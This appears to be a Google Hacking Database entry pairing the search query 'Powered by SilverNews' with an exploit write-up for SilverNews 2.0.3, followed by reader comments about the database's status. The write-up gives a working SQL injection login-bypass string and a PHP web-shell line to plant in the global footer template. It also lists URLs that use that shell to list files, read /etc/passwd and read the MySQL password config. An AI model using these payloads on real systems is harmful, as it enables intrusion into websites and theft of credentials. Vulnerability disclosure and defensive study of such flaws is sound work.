GHDB « Hackers For Charity

GHDB

GHDB

Google Search: “Powered by SilverNews”

rgod rates this entry 8 out of 10.
Submitted: 2005-08-07 00:00:00
Added by: rgod
Hits: 2328
Score: 8

silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands execution / cross site scripting software: author site: http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews SQL Injection / Login bypass: A user can bypass admin password check, if magic_quotes is set to off: user: ‘ or isnull(1/0) /* pass: whatever remote commands execution: now, new admin can edit template, clicking on Templates -> Global footer, can add the lines: //*********************************************** TEMPLATE; } } system($HTTP_GET_VARS[command]); /* to leave a backdoor in template file /templates/tpl_global.php now can launch system commands on the target system with theese urls: http://[target]/[path]//templates/tpl_global.php?command=ls%20-la to list directories http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd to see /etc/passwd file http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php to see Mysql database password cross site scripting: same way, a user can hide evil javascript code in template

Comments:


5 Responses to “GHDB”

  1. Jack says:
    October 26, 2011 at 9:12 pm

    Does GHDB still updates for now?

  2. Johnny says:
    October 27, 2011 at 3:31 am

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:
    April 20, 2013 at 7:10 am

    Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???

  4. Johnny says:
    April 27, 2013 at 5:10 am

    The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:
    May 7, 2013 at 7:38 am

    Is any offline view-able resources is available of this product ?

Leave a Reply